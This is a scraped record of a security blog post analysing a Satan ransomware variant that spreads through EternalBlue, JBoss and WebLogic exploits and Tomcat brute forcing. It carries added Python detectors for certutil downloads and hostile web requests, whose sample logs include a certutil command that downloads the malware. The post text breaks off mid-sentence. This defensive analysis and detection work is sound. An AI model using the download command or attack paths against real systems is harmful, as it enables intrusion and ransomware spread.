Source |
AlienVault Lab Blog |
Identifier |
740343 |
Publication date |
2018-06-01 15:00:00 (viewed: 2018-07-11 17:03:30) |
Title |
Satan Ransomware Spawns New Methods to Spread |
Text |
Today, we are sharing an example of how previously known malware keeps evolving and adding new techniques to infect more systems.
BleepingComputer first reported on Satan ransomware in January 2017. Recently, Satan Ransomware was identified as using the EternalBlue exploit to spread across compromised environments (BartBlaze’s blog). This is the same exploit associated with the earlier WannaCry Ransomware campaign. Although Microsoft patched the vulnerability behind EternalBlue in March 2017 (MS17-010), many environments remain unpatched and exploitable.
Unusually, we’ve identified samples of Satan Ransomware that not only include EternalBlue, but also a far larger set of propagation methods. This Satan variant attempts to propagate through:
JBoss CVE-2017-12149
Weblogic CVE-2017-10271
EternalBlue exploit CVE-2017-0143
Tomcat web application brute forcing
Malware Analysis
Below is a sample from early May 2018 of Satan Ransomware using all the previously mentioned techniques, which we are going to analyze.
Name: sts.exe
File size: 1.7 MB
MD5: c290cd24892905fbcf3cb39929de19a5
The first thing we see in the analyzed sample is that the malware is packed with the MPRESS packer.
The main goal of this sample is to drop Satan Ransomware, encrypt the victim's host, and then request a Bitcoin payment. Afterwards, the sample also tries to spread across the network using exploits such as EternalBlue.
EternalBlue
The malware drops several EternalBlue files on the victim’s host. These files are a public version of the exploit without any modifications or custom implementations. All are dropped into the folder C:\Users\All Users\ on the infected system.
sts.exe initiates the spreading process by scanning all systems within the same network segment. The command line it launches causes systems vulnerable to the SMB EternalBlue exploit to execute the previously dropped library down64.dll.
down64.dll attempts to load code into the target’s memory and then downloads sts.exe using the legitimate Microsoft certutil.exe tool. This is a well-known download technique, described as Remote File Copy - T1105 in MITRE ATT&CK.
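The certutil.exe download step above is the part of this chain that is easiest to catch from endpoint telemetry, because certutil almost never needs to fetch remote URLs in normal operation. The following detection is an added example written for this page, not code from the AlienVault post or from the Satan sample. It runs over constructed, Sysmon-style process-creation records (flattened to one key=value line each); the certutil command lines are the generic "-urlcache -split -f <url> <file>" download idiom, not the exact command line down64.dll issues, and the hosts and paths in them are invented.

```python
"""Flag certutil.exe being used as a downloader (MITRE ATT&CK T1105).

Added example, not code from the AlienVault post. The telemetry below is
constructed: Sysmon-style process-creation records flattened to one
"key=value|key=value" line each. The certutil command lines are generic
examples of the "-urlcache -split -f <url> <file>" download idiom, not the
exact command line used by the Satan sample; URLs and hosts are invented.
"""
import re
from typing import Dict, List, Optional

# Constructed sample telemetry (not real logs). Two records are downloads,
# one is a benign certutil use, one is an unrelated process.
SAMPLE_EVENTS = """\
Image=C:\\Windows\\System32\\certutil.exe|ParentImage=C:\\Windows\\System32\\rundll32.exe|CommandLine=certutil.exe -urlcache -split -f http://198.51.100.7/sts.exe "C:\\Users\\All Users\\sts.exe"
Image=C:\\Windows\\System32\\certutil.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=certutil.exe -verify C:\\temp\\cert.cer
Image=C:\\Windows\\System32\\certutil.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=CertUtil /URLCache /f https://example.test/a.bin a.bin
Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=notepad.exe notes.txt
"""

# certutil accepts both "-" and "/" as option prefixes and ignores case.
URLCACHE_FLAG = re.compile(r"(?:^|\s)[-/]urlcache\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split one flattened record into a field dict (first '=' separates key and value)."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def image_basename(path: str) -> str:
    """Lower-cased file name of an image path, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extract_url(cmdline: str) -> Optional[str]:
    """First http(s) URL on the command line, or None."""
    m = URL_RE.search(cmdline)
    return m.group(0) if m else None


def is_certutil_download(event: Dict[str, str]) -> bool:
    """True when certutil.exe is invoked with -urlcache and a remote URL."""
    if image_basename(event.get("Image", "")) != "certutil.exe":
        return False
    cmd = event.get("CommandLine", "")
    return bool(URLCACHE_FLAG.search(cmd) and extract_url(cmd))


def detect(events_text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious certutil invocation, in log order."""
    findings = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        if is_certutil_download(event):
            findings.append({
                "url": extract_url(event["CommandLine"]),
                "parent": image_basename(event.get("ParentImage", "")),
                "command": event["CommandLine"],
                "technique": "T1105",
            })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[T1105] certutil download of {f['url']} (parent: {f['parent']})")
```

The parent process is kept in each finding because it is what separates this chain from an administrator's certutil use: a certutil download spawned by rundll32.exe, as a DLL loaded through SMB would produce, deserves a much higher priority than one spawned from an interactive shell.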
So Many Exploits....
The sample also uses other network activity to continue spreading across the network.
A compromised system makes an HTTP PUT request to /Clist1.jsp, uploading a JSP file that, when executed, downloads another copy of sts.exe onto the target server.
Another interesting technique used to infect other systems is the ability to identify an Apache Tomcat server and brute force it. It make |
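Each of the web-facing propagation methods listed above (the JSP upload via PUT, the JBoss and WebLogic exploits, and the Tomcat manager brute force) leaves a distinctive trace in the target's access log. The hunting script below is an added example written for this page, not code from the AlienVault post or from the malware. It runs over constructed Apache/Tomcat combined-format log lines with invented client addresses and timestamps. /Clist1.jsp and /manager/html come from the post; /invoker/readonly and /wls-wsat/CoordinatorPortType are the standard endpoints targeted by CVE-2017-12149 and CVE-2017-10271 respectively, and the brute-force threshold is an assumed tuning value.

```python
"""Hunt web-server access logs for the propagation paths this Satan variant
uses: a PUT that uploads a JSP, JBoss HttpInvoker (CVE-2017-12149), WebLogic
wls-wsat (CVE-2017-10271) and Tomcat manager brute forcing.

Added example, not code from the AlienVault post. The log lines are
constructed in Apache/Tomcat combined format; client addresses and
timestamps are invented. BRUTE_FORCE_THRESHOLD is an assumed tuning value.
"""
import re
from collections import Counter
from typing import Dict, List, Optional

# Constructed sample log (not real data): one attacker at 203.0.113.9 runs
# the full chain; 192.0.2.44 is a legitimate admin.
SAMPLE_LOG = """\
203.0.113.9 - - [02/May/2018:10:01:12 +0000] "PUT /Clist1.jsp HTTP/1.1" 201 0 "-" "Mozilla/4.0"
203.0.113.9 - - [02/May/2018:10:01:13 +0000] "GET /Clist1.jsp HTTP/1.1" 200 35 "-" "Mozilla/4.0"
203.0.113.9 - - [02/May/2018:10:02:01 +0000] "POST /invoker/readonly HTTP/1.1" 500 1203 "-" "Java/1.8.0"
203.0.113.9 - - [02/May/2018:10:02:40 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1710 "-" "Java/1.8.0"
203.0.113.9 - - [02/May/2018:10:03:00 +0000] "GET /manager/html HTTP/1.1" 401 2473 "-" "Mozilla/4.0"
203.0.113.9 - - [02/May/2018:10:03:01 +0000] "GET /manager/html HTTP/1.1" 401 2473 "-" "Mozilla/4.0"
203.0.113.9 - - [02/May/2018:10:03:01 +0000] "GET /manager/html HTTP/1.1" 401 2473 "-" "Mozilla/4.0"
203.0.113.9 - - [02/May/2018:10:03:02 +0000] "GET /manager/html HTTP/1.1" 401 2473 "-" "Mozilla/4.0"
203.0.113.9 - - [02/May/2018:10:03:02 +0000] "GET /manager/html HTTP/1.1" 401 2473 "-" "Mozilla/4.0"
203.0.113.9 - - [02/May/2018:10:03:03 +0000] "GET /manager/html HTTP/1.1" 200 9120 "-" "Mozilla/4.0"
192.0.2.44 - admin [02/May/2018:10:05:00 +0000] "GET /manager/html HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
192.0.2.44 - - [02/May/2018:10:06:00 +0000] "GET /orders/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Combined log format: client ident user [ts] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

BRUTE_FORCE_THRESHOLD = 5  # 401s from one client to /manager/html (assumed)
TOMCAT_MANAGER = "/manager/html"


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["path"] = entry["path"].split("?", 1)[0].lower()  # drop query, normalise case
    return entry


def classify(entry: Dict[str, str]) -> Optional[str]:
    """Single-request rules; stateful rules live in hunt()."""
    if entry["method"] == "PUT" and entry["path"].endswith(".jsp"):
        return "jsp-upload-via-PUT"
    if entry["path"] == "/invoker/readonly":
        return "jboss-cve-2017-12149"
    if entry["path"].startswith("/wls-wsat/"):
        return "weblogic-cve-2017-10271"
    return None


def hunt(log_text: str) -> List[Dict[str, str]]:
    """Return findings in log order; brute-force totals are appended last."""
    findings: List[Dict[str, str]] = []
    failed_logins: Counter = Counter()   # client -> 401s on the manager app
    uploaded_jsps = set()                # paths written with PUT, per log
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None:
            continue
        request = f"{e['method']} {e['path']}"
        rule = classify(e)
        if rule:
            findings.append({"rule": rule, "client": e["client"], "request": request})
        if rule == "jsp-upload-via-PUT":
            uploaded_jsps.add(e["path"])
        elif e["path"] in uploaded_jsps:
            # The uploaded JSP is requested again: this is when its body runs.
            findings.append({"rule": "uploaded-jsp-executed", "client": e["client"], "request": request})
        if e["path"] == TOMCAT_MANAGER:
            if e["status"] == "401":
                failed_logins[e["client"]] += 1
            elif e["status"] == "200" and failed_logins[e["client"]] >= BRUTE_FORCE_THRESHOLD:
                findings.append({"rule": "tomcat-manager-brute-force-success",
                                 "client": e["client"], "request": request})
    for client, n in failed_logins.items():
        if n >= BRUTE_FORCE_THRESHOLD:
            findings.append({"rule": "tomcat-manager-brute-force", "client": client,
                             "request": f"{n} x 401 on {TOMCAT_MANAGER}"})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f['rule']:36} {f['client']:15} {f['request']}")
```

The 500 responses on the JBoss and WebLogic endpoints are deliberately not treated as a sign that the exploit failed: both deserialization bugs commonly return a server error even when the payload ran, so the request itself is the indicator. A 200 on /manager/html immediately after a run of 401s from the same client is the one event here that should page someone, because it means the brute force found valid credentials.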
Keyword digest |
/clist1 /invoker/readonly /manager/html /orders /wls 119 124 132 5f30aa2fe338191b972705412b8043b0a134cdb287d754771fc225f2309e82ee addresses: b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa b7d8fcc3fb533e5e0069e00bc5a68551479e54a990bb1b658e1bd092c0507d68 cf12eca0e10dc3370d7917e7678dc09629240d3e7cc71c5ac0df68576bea0682 chris collaborations da72b39bb12 doman f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a fernando jsp martinez methods new paths: ransomware satan spawns spread thanks uri wsat/coordinatorporttype xhtml |
Tags |
Ransomware |
Stories |
Wannacry |